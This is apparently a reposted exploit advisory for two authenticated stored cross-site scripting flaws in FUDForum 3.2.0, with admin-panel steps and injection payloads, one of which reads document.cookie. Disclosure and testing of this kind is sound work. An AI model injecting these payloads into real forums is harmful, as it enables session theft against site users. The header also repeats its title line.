# Exploit Title: FUDForum 3.2.0 Stored XSS Authenticated
# Exploit Author: # Exploit Title: FUDForum 3.2.0 Stored XSS Authenticated
# Exploit Author: tmrswrr
# Vendor Homepage: http://fudforum.org/
# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.2.0.zip/download
# Version : 3.2.0
## First Stored XSS
1. Log in with valid administrator credentials.
2. Click Filters > Login Filters
3. Inject Payload Login Blocker Add New Filter:
"><sVg/onLy=1 onLoaD=confirm(1)//
## Second Stored XSS
1. Log in with valid administrator credentials.
2. Click General Management > Error Log Viewer
3. Inject Payload Search for field:
"><img src=x onerrora=confirm() onerror=confirm(document.cookie)>
FUDForum 3.2.0 Cross Site Scripting
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 42